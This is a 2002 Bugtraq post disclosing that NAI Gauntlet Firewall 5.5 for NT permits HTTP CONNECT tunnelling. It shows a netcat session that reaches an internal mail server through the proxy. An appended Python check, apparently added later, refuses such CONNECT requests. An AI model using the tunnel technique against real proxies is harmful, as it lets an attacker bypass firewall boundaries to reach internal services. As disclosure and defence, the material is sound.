Bugtraq mailing list archives

NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131))


From: "Rashed Alabbar" <rashed.alabbar () datafort net>
Date: Thu, 28 Feb 2002 18:33:26 +0400

Hi all,

    I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, and it worked.

I don't know if this was published earlier or not, but here it goes:

Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)

Examples: (I'm using Volker Tanger [volker.tanger () discon de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)

Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z

nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0

HTTP/1.0 200 OK

mail server banner


That's it!


Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email:   rashed.alabbar () datafort net
http://www.datafort.net

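A proxy-side check that would refuse the request shown in the message above, as an added example (not from the original post or from any vendor's code): CONNECT is permitted only to an allowlisted port and never to an address literal inside a protected range. The port allowlist, the network ranges and the function names are assumptions for illustration.

```python
import ipaddress

# Assumed policy values for illustration; replace with the site's own rules.
ALLOWED_CONNECT_PORTS = {443}
PROTECTED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "::1/128", "fc00::/7")]


def parse_connect(request_line):
    """Return (host, port) from a CONNECT request line, or None if malformed."""
    parts = request_line.strip().split()
    if len(parts) != 3 or parts[0].upper() != "CONNECT":
        return None
    if not parts[2].upper().startswith("HTTP/"):
        return None
    host, sep, port = parts[1].rpartition(":")
    if not sep or not host or not port.isdecimal():
        return None
    port = int(port)
    if not 0 < port < 65536:
        return None
    return host.strip("[]"), port


def connect_decision(request_line):
    """Return ("allow" or "deny", reason) for one CONNECT request line."""
    target = parse_connect(request_line)
    if target is None:
        return "deny", "malformed CONNECT request"
    host, port = target
    if port not in ALLOWED_CONNECT_PORTS:
        return "deny", f"port {port} not in CONNECT allowlist"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Hostname: a real proxy must repeat the range check on the
        # address the name resolves to before opening the tunnel.
        return "allow", "hostname target on allowed port"
    if any(addr in net for net in PROTECTED_NETS):
        return "deny", f"{addr} is inside a protected network"
    return "allow", "external address on allowed port"
```

With this policy the `CONNECT z.z.z.z:25 HTTP/1.0` request from the message is denied on the port check before any connection to the mail server is attempted.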
